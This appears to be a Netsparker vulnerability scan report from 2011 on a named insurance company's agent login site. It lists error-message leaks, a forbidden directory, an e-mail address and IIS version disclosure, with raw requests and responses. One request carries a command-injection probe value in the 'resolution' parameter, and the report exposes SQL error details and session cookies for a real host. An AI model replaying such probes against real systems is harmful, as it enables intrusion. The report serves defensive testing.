COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.labelTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 12pt;
COLOR: black;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.fieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 7pt;
COLOR: #000099;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
BORDER-RIGHT: #78263a 1px solid;
BORDER-TOP: #78263a 1px solid;
BACKGROUND: #ffffff;
BORDER-LEFT: #78263a 1px solid;
BORDER-BOTTOM: #78263a 1px solid;
}
.blackfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #000000;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.greyfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #999999;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.redfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 9pt;
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.smallTxt
{
FONT-SIZE: 7pt;
COLOR: #262626;
FONT-STYLE: normal;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.bluefieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.activetableTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Helvetica, Ariel;
BACKGROUND-COLOR: #cccccc
}
.notactivetableTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 10pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Ariel;
BACKGROUND-COLOR: #0000ff
}
.errorTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 8pt;
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Arial, Verdana
}
.ageneralblue
{
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.ageneralblue:hover
{
FONT-SIZE: 11pt;
COLOR: #333399;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
TEXT-DECORATION: underline
}
.ageneralblue:active
{
FONT-SIZE: 11pt;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}

.awhitebold
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #ffffff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.awhitebold:hover
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #ccccff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
TEXT-DECORATION: underline
}
.awhitebold:active
{
FONT-SIZE: 11pt;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
font_weight: bold
}


A.ageneral:link {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
}
A.ageneral:visited {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
}
A.ageneral:hover {
color: #8E0D34;
size: 11pt;
text-decoration: underline;
family: 'MS Sans Serif', Verdana, Arial;
}

A.ageneralbold:link {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}
A.ageneralbold:visited {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}
A.ageneralbold:hover {
color: #8E0D34;
size: 11pt;
text-decoration: underline;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}

table
{
border-color: #78263a;
}
</style>



</head>

<BODY>
<center>
<p>
<table style="testStyle" width="90%">
<tr>
<td>
<h2> Browser Recommednations: </h2>
</td>
</tr>
<p>
<p>
<tr>
<td class = "titleTxt">
<h3>This site was optimized for use with Microsoft&reg; Internet Explorer
4.0 or higher. In order to user this application you need to install more up-to-date version of Internet Explorer.&nbsp;&nbsp;</h3>

<br>
To install the newest version of Microsoft Internet Explorer go to:&nbsp;&nbsp;
<a class = "ageneral" target = "_self" href = "https://www.microsoft.com/downloads/search.asp">Download Internet Explorer</a>

</td>
</tr>
</table>
</center>
<p>
<hr>
</BODY>
</HTML>
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /PVAllOne/AllOne/OpenAllOne.asp

/PVAllOne/AllOne/OpenAllOne.asp

https://www.ari-allternet.com/PVAllOne/AllOne/OpenAllOne.asp?resolution=

Request

GET /PVAllOne/AllOne/OpenAllOne.asp?resolution= HTTP/1.1
Referer: https://www.ari-allternet.com/PVAllOne/AllOne/AllWebStart.asp?resolution=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.ari-allternet.com
Cookie: ASPSESSIONIDSQRSBDBT=INODLHGAFBHEOLEIMDMLIMLE; SessionID=108740313; DontShow=1; S%5FID=108740313; DoNotShow=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 10 Mar 2011 20:22:59 GMT
Server: Microsoft-IIS/6.0
www.ari-allternet.com:
X-Powered-By: ASP.NET
Content-Length: 7423
Content-Type: text/html
Expires: Wed, 09 Mar 2011 20:22:58 GMT
Cache-control: private






<HTML>
<HEAD>
<Title> All Web</Title>
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/THEME.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/GRAPH0.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/COLOR0.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/CUSTOM.CSS" VI6.0THEME="Bars"></head>

<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<Script language = "javascript">



function LTrim(str){
for (var i=0; str.charAt(i)==" "; i++);
return str.substring(i,str.length);
}



function RTrim(str){
for (var i=str.length-1; str.charAt(i)==" "; i--);
return str.substring(0,i+1);
}



function Trim(str){
return LTrim(RTrim(str));
}



function ToProperCase(str) {
str = str.toLowerCase();
var strFirstLetter = str.substring(0, 1);
strFirstLetter = strFirstLetter.toUpperCase();
var len = str.length;
var strTheRest = str.substring(1, len);
str = strFirstLetter + strTheRest;
return str;
}


function ToUpperCase(str) {
str = str.toUpperCase();
return str;
}

// Reload the currently passed page name passing along the count of retries and the resolution of
// the page. This is used by the SessionRetry function below.
function ReloadPage(pageName, retryCnt, resolution)
{
window.location = pageName + "?retrycnt=" + retryCnt + "&resolution=" + resolution;
}

// This is called from server side code SessionInvalidRetry() found in AllOneAspFunctions,asp used to
// retry the page when a the session information load fails.
function SessionRetry(pageName, retryCnt, resolution)
{
if (retryCnt < 5)
{
setTimeout("ReloadPage('" + pageName + "'," + retryCnt + "," + resolution + ");",500)
}
}

function SessionNotValid(showMessage) {
if (showMessage > 0) {
//alert("Duplicate User ID has been found. Your Session has been terminated.");
alert("The page has timed out. Please retry.");
}
if (showMessage == 2){
window.location = "../include/window_closer.html";
}
else {
self.focus();
}
}


/**
The following functions is used to manage a prograss bar popup
**/
var progressEnd = 9; // set to number of progress <span>'s.
var progressColor = 'blue'; // set to progress bar color
var progressInterval = 1000; // set to time between updates (milli-seconds)
var pd = window;

var progressAt = progressEnd;
var progressTimer;

function initPopup(pHndle,pgId,pgHeading) {
//var pd = eval(pHndle) ;
if (pgId == null) pgid = 'pgprogress' ;
if (pgHeading == null) pgHeading='Processing information. Please Wait';
pd.document.write('<div id="'+pgid+'" class="hide">');
pd.document.write('<table width="38%" align="left" border="5" cellpadding="1" bordercolordark="cadetblue" bordercolorlight="teal" bgcolor="white" onClick="progress_hide();">');
pd.document.write('<tr>');
pd.document.write(' <td align="center" class="pbHader">'+pgHeading+'</td>');
pd.document.write(' </tr>');
pd.document.write('<tr><td align="center">');
pd.document.write(' <table width="100%" border="0" cellpadding="2" cellspacing="2"><tr><td>');
pd.document.write(' <div style="padding:2px;border:solid cadetblue 1px">');
pd.document.write(' <span id="progress1" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress2" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress3" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress4" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress5" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress6" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress7" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress8" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress9" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' </div>');
pd.document.write(' </td></tr></table>');
pd.document.write('</td></tr></table>');
pd.document.write('</div>');
progressAt = progressEnd;
}

function progress_clear() {
//for (var i = 1; i <= progressEnd; i++) pd.document.getElementById('progress'+i).style.backgroundColor = 'transparent';
//for (var i = 1; i <= progressEnd; i++) pd.document.getElementById('progress'+i).style.backgroundImage= '';
if (progressAt>0) {
if (progressColor =='#8E0D34') {
progressColor ='#EEB4B4' ;
} else {
progressColor ='#8E0D34' ;
}

} else {
//progressColor ='transparent' ;
progressColor ='#EEB4B4' ;
for (var i = 1; i <= progressEnd; i++) pd.document.getElementById('progress'+i).style.backgroundColor = 'transparent';
}
progressAt = 0;
}
function progress_update() {
progressAt++;
if (progressAt > progressEnd) progress_clear();
else pd.document.getElementById('progress'+progressAt).style.backgroundColor = progressColor;
//else pd.document.getElementById('progress'+progressAt).style.backgroundImage = 'url(../images/fish1.ico)';
progressTimer = setTimeout('progress_update()',progressInterval);
}
function progress_stop(pHndle) {
clearTimeout(progressTimer);
progress_clear(pHndle);

}

function progress_hide(pHndle,pbId) {
//var pw = eval(pHndle);
/*
alert('progress_hide called');
alert(pd);
alert(eval(pHndle));
*/
pd = eval(pHndle)
progress_stop(pHndle);
for (var i = 1; i <= progressEnd; i++) pd.document.getElementById('progress'+i).style.backgroundColor = 'transparent';
progressAt = progressEnd;
if (pbId == null) pbId = 'pgprogress';
pd.document.getElementById(pbId).style.visibility = 'hidden' ;
}
function progress_show(pHndle,pbId,heading) {

//update global variable
pd = eval(pHndle);
for (var i = 1; i <= progressEnd; i++) pd.document.getElementById('progress'+i).style.backgroundColor = 'transparent';
//initPopup(pHndle,pbId,heading) ;
if (pbId == null) pbId = "pgprogress";
var w = 480, h = 340;
var popW = 1000, popH = 400;

if (document.all || document.layers) {
w = screen.availWidth;
h = screen.availHeight;
}

var leftPos = (w-popW)/2, topPos = (h-popH)/2;

pd.document.getElementById(pbId).style.visibility = 'visible' ;
pd.document.getElementById(pbId).style.position='absolute';
pd.document.getElementById(pbId).style.left = 83;//leftPos;//+'px' ;
pd.document.getElementById(pbId).style.top = 0;//topPos;//+'px';
pd.document.getElementById(pbId).style.width = popW;//+'%' ;
pd.document.getElementById(pbId).style.height = popH;//+'px' ;
progress_update();

}

</Script><!--
Public Property Get x()
x ==getVal("x")
End Property
Public Property Let x(Value)
Call letVal("x", Value)
End Property
-->

</HEAD>

<font face="Arial" size=2><p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '='.</font><p><font face="Arial" size=2>/PVAllOne/AllOne/OpenAllOne.asp</font><font face="Arial" size=2>, line 60</font>
Programming Error Message

Programming Error Message

1 TOTAL
LOW
Netsparker identified a programming error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. type data may be disclosed. Most of these issues will be identified and reported separately by Netsparker.

Remedy

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database then show this number and a static user-friendly error message to the user.
- /Login/BrowserResolution.asp

/Login/BrowserResolution.asp

https://www.ari-allternet.com/Login/BrowserResolution.asp?resolution=%22%26%20SET%20%2FA%200xFFF9999..

Parameters

Parameter Type Value
resolution GET "& SET /A 0xFFF9999-2 &

Identified Error Message

Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font>

Request

GET /Login/BrowserResolution.asp?resolution=%22%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://www.ari-allternet.com/Login/Login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.ari-allternet.com
Cookie: ASPSESSIONIDSQRSBDBT=INODLHGAFBHEOLEIMDMLIMLE; SessionID=108740313; DontShow=1; S%5FID=108740313; DoNotShow=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 10 Mar 2011 20:23:06 GMT
Server: Microsoft-IIS/6.0
www.ari-allternet.com:
X-Powered-By: ASP.NET
Content-Length: 330
Content-Type: text/html
Expires: Wed, 09 Mar 2011 20:23:06 GMT
Cache-control: private


<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: '[string: &quot;&quot;&amp; SET /A 0xFFF9999-&quot;]'</font><p><font face="Arial" size=2>/Login/BrowserResolution.asp</font><font face="Arial" size=2>, line 10</font>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /Login/

/Login/ CONFIRMED

https://www.ari-allternet.com/Login/

Request

GET /Login/ HTTP/1.1
Referer: https://www.ari-allternet.com/Login/BrowserDeclined.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.ari-allternet.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
www.ari-allternet.com:
X-Powered-By: ASP.NET
Date: Thu, 10 Mar 2011 20:22:50 GMT


<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /Login/Login.asp

/Login/Login.asp

https://www.ari-allternet.com/Login/Login.asp

Found E-mails

info@ari-ins.com

Request

GET /Login/Login.asp HTTP/1.1
Referer: https://www.ari-allternet.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.ari-allternet.com
Cookie: ASPSESSIONIDSQRSBDBT=INODLHGAFBHEOLEIMDMLIMLE
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 20:22:50 GMT
Server: Microsoft-IIS/6.0
www.ari-allternet.com:
X-Powered-By: ASP.NET
Content-Length: 14555
Content-Type: text/html
Expires: Wed, 09 Mar 2011 20:22:50 GMT
Set-Cookie: SessionID=108740313; expires=Fri, 11-Mar-2011 05:00:00 GMT; path=/,CheckAllOneWeb=1; expires=Thu, 10-Mar-2011 06:00:00 GMT; path=/
Cache-control: private



<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<title>Login</title>
<!--<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/THEME.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/GRAPH0.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/COLOR0.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/CUSTOM.CSS" VI6.0THEME="Bars"> --></head>

<STYLE type="text/css">
.headerTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 13pt;
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arieal;
font_Size: 16pt
}
.titleTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.labelTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 12pt;
COLOR: black;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.fieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 7pt;
COLOR: #000099;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
BORDER-RIGHT: #78263a 1px solid;
BORDER-TOP: #78263a 1px solid;
BACKGROUND: #ffffff;
BORDER-LEFT: #78263a 1px solid;
BORDER-BOTTOM: #78263a 1px solid;
}
.blackfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #000000;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.greyfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #999999;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.redfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 9pt;
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.smallTxt
{
FONT-SIZE: 7pt;
COLOR: #262626;
FONT-STYLE: normal;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.bluefieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.activetableTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Helvetica, Ariel;
BACKGROUND-COLOR: #cccccc
}
.notactivetableTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 10pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Ariel;
BACKGROUND-COLOR: #0000ff
}
.errorTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 8pt;
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Arial, Verdana
}
.ageneralblue
{
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.ageneralblue:hover
{
FONT-SIZE: 11pt;
COLOR: #333399;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
TEXT-DECORATION: underline
}
.ageneralblue:active
{
FONT-SIZE: 11pt;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}

.awhitebold
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #ffffff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.awhitebold:hover
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #ccccff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
TEXT-DECORATION: underline
}
.awhitebold:active
{
FONT-SIZE: 11pt;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
font_weight: bold
}


A.ageneral:link {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
}
A.ageneral:visited {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
}
A.ageneral:hover {
color: #8E0D34;
size: 11pt;
text-decoration: underline;
family: 'MS Sans Serif', Verdana, Arial;
}

A.ageneralbold:link {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}
A.ageneralbold:visited {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}
A.ageneralbold:hover {
color: #8E0D34;
size: 11pt;
text-decoration: underline;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}

table
{
border-color: #78263a;
}
</style>


<!--
Public Property Get x()
x ==getVal("x")
End Property
Public Property Let x(Value)
Call letVal("x", Value)
End Property
-->


<script language="javascript">
<!--
var WinRes;

function CheckBrowser(intCookie) {
//if (navigator.appName == "Netscape" && parseInt(navigator.appVersion.charAt(0)) < 4) {
if (navigator.appName == "Netscape") {
window.location = "BrowserDeclined.asp";
}

if (navigator.appName.indexOf("Explorer") > 0 && parseInt(navigator.appVersion.charAt(0)) < 4) {
window.location = "BrowserDeclined.asp";
}

//Textbox - set focus:
if(null!=document.loginForm.UserName) {
document.loginForm.UserName.focus();
}
//check resolution
var resolution = screen.height;
if (resolution < 600) {
//decline browser:
window.location = "BrowserResolution.asp?resolution=1";
}
else {
if (resolution < 700 && intCookie != 1) {
//show recommendation to change the browser settings:
if (!WinRes || WinRes.closed) {
WinRes = window.open("BrowserResolution.asp?resolution=2", '_WinRes', 'menubar = false, width =400, height = 200, top = 200, left = 170');
}
else {
// window's already open; bring to front
WinRes.close();
WinRes = window.open("BrowserResolution.asp?resolution=2", '_WinRes', 'menubar = false, width =400, height = 200, top = 200, left = 170');
}
}
}

}

function onKeyUp()
{
//alert(event.keyCode)
var code = event.keyCode
switch (code) {
case 13: //do automatic carrige return
document.loginForm.submit() ;
break
}
}

var AllWebWin;

function OpenAllWeb(UserID) {
var resolution = screen.availHeight;
var winProperties ='menubar = false, width ='+ window.screen.availWidth +', height ='+ (window.screen.availHeight - 30) +', top = 0, left = 0';

if (!AllWebWin || AllWebWin.closed) {
AllWebWin = window.open("../PVAllOne/AllOne/AllWeb.asp?strUserID=" + UserID + "&resolution=" + resolution, '_mainWindow', winProperties);
if (navigator.appName == "Netscape") {
AllWebWin.outerWidth = screen.availWidth;
AllWebWin.outerHeight = screen.availHeight;
AllWebWin.moveTo(0,0);
}

}
else {
AllWebWin.focus()
}
}


function LogOut() {
var closeWin = window.open("LogoutImproper.asp", '_LogOutImproper', 'menubar = false, width =300, height = 200, top = 100, left = 100');
if (navigator.appName == "Netscape") {
closeWin.outerWidth = 300;
closeWin.outerHeight = 200;
closeWin.moveTo(100, 100);
}
window.location = "Login.asp";
}

function SavePassword()
{
var strOldPswd = document.forms[0].password.value;
var strNewPswd = document.forms[0].NewPassword.value;
var strConfPswd = document.forms[0].ConfirmNewPassword.value;

if (strNewPswd == strOldPswd)
{
alert("Your new password can't match your old password.");
document.forms[0].password.value = "";
document.forms[0].NewPassword.value = "";
document.forms[0].ConfirmNewPassword.value = "";
return false;
}
if (strNewPswd != strConfPswd)
{
alert("Your new password does not match the confirmed password.");
document.forms[0].NewPassword.value = "";
document.forms[0].ConfirmNewPassword.value = "";
return false;
}
if (strNewPswd =="" || strConfPswd=="")
{
alert("Please fill out the form completely");
document.forms[0].NewPassword.value = "";
document.forms[0].ConfirmNewPassword.value = "";
return false;
}
return true;
}

function goURL(page, protocol){
var baseURL = protocol + "://www.ari-ins.com/";
document.location.href = baseURL + page;
}
-->
</script>
<noscript>
<img src="../images/main_02.jpg"><br>
<b>Your Browser has JavaScript turned off. </b><p>
In order to use this application you need to turn Java Script on. <br>
Open you browser preferences, and enable Java Script.<br>
You do not have to restart your browser or your computer after you enable Java Script. Simply click the &quot;Reload&quot; button.
<hr>
</noscript>
<link rel="stylesheet" href="../images/ari_li.css" type="text/css" />
</head>



<body bgcolor="#DDD8CC" leftmargin="0" topmargin="0" rightmargin="0" bottommargin="0">
<div align="center" >
<table width="750" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="1%" valign="top" class="pageborder">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="100%" colspan="3" class="toptile"><img src="../images/top_tile.gif" width="13" height="16"></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="35" height="36" valign="top"><img src="../images/menuleft.gif" width="35" height="36"></td>
<td valign="top" class="menu"><a href="javascript:goURL('index.htm', 'http');" class="menuitem">Home</a>
<img src="../images/menudiv.gif" width="26" height="29" align="middle">
<a href="javascript:goURL('ari_aboutus.htm', 'http');" class="menuitem">About Us</a> <img src="../images/menudiv.gif" width="26" height="29" align="middle">
<a href="javascript:goURL('press.htm', 'http');" class="menuitem">Press Releases</a>
<img src="../images/menudiv.gif" width="26" height="29" align="middle">
<span class="menuitemselect">Agent Login</span> <img src="../images/menudiv.gif" width="26" height="29" align="middle">
<a href="javascript:goURL('claims.htm', 'http');" class="menuitem">Claims</a> <img src="../images/menudiv.gif" width="26" height="29" align="middle">
</td>
<td width="35" align="right" valign="top"><img src="../images/menuright.gif" width="35" height="36"></td>
</tr>
</table>
<!--end of about header-->
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="456"><img src="images/main_01.jpg" width="456" height="232"></td>
<td width="313"><img src="images/main_02.jpg" width="313" height="232"></td>
</tr>
</table> </td>
</tr>

<tr>
<td height="98%" align="center" valign="top" bgcolor="#FFFFFF" class="pageborder" style="padding: 10 0 0 0;">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="214" align="center" valign="top" style="border-right:1px solid #B9BDB9;"><img src="../images/leftbanner.gif" width="198" height="121">
<div style="padding-bottom:10px;"></div>
<table width="198" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="233"><img src="../images/lefttable_top.gif" width="198" height="15"></td>
</tr>
<tr>
<td class="lefttable"><strong>Contact Us</strong><br> <br> <strong>ARI
Insurance Companies</strong><br>
133 Franklin Corner Road<br>
Lawrenceville, NJ 08648<br> <br>
Phone: 800-820-4506<br>
Fax: 609-882-4088<br>
<a href="mailto:info@ari-ins.com">info@ari-ins.com</a> </td>
</tr>
<tr>
<td><img src="../images/lefttable_bottom.gif" width="198" height="15"></td>
</tr>
</table></td>
<td width="568" valign="top"><div class="bodytext"><span class="headings">Agent
Login<br>
<br>
</span>
<hr align="left" width="95%" size="1" noshade>
<span class="headings"> </span></div>
<div class="bodytext" style="padding:0 0 0 50;">



<body onload="CheckBrowser()">
<p>
<center>
<form method="post" action="Login.asp" id="loginForm" name="loginForm">
<br>
<br>
<br>
<table style="WIDTH: 500px; HEIGHT: 308px" bgcolor="white">
<tr><td>
<table width="100%">


<tr> <td>
<table border="0" width="100%" cellpadding="3" bgcolor="white">
<tr>

<td width="12%" height="35" class="bodytd">
User ID: </td>
<td width="88%" height="35"><input name="UserName" maxlength="50" value="" class="textarea" onKeyUp="javascript:onKeyUp()"></td>

</tr>
<tr>

<td width="12%" height="35" class="bodytd">
Password</td>
<td width="88%" height="35"><input type="password" name="password" maxlength="12" class="textarea" onKeyUp="javascript:onKeyUp()"></td>
</tr>
<tr>
<td>&nbsp;</td>
<td style="padding: 6 0 0 0;"><input name="button" type="button" class="buttonstyle" value="Sign On"onclick="document.loginForm.submit()"></td>
</tr>
<tr>
<td>&nbsp;</td>
<td class="bodytd" style="padding:14 0 0 0;"><a href="Password.asp?strError=0" class="newslinks">
Forgot your password</a></td>
</tr>
<tr>
<td>&nbsp;</td>
<td class="bodytd" style="padding:14 0 0 0;"><a href="browsers.asp" class="newslinks">Browser Recommendations</a></td>
</tr>
<tr>
<td>&nbsp;</td>
<td class="bodytd" style="padding:14 0 0 0;"><a href="faq.htm" class="newslinks">Frequently Asked Questions</a></td>
</tr>
</table>
<p>&nbsp;</p>
<div style="margin: 10 0 10 0">
<img src="sslcert.gif" />
</div>
</td></tr>
</table>
</td></tr>
</table>
</form>
</p>
</center>


</div>
</td>
</tr>
<tr>
<td align="right"&g..
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /Login/BrowserDeclined.asp

/Login/BrowserDeclined.asp

https://www.ari-allternet.com/Login/BrowserDeclined.asp

Extracted Version

Microsoft-IIS/6.0

Request

GET /Login/BrowserDeclined.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.ari-allternet.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 20:22:51 GMT
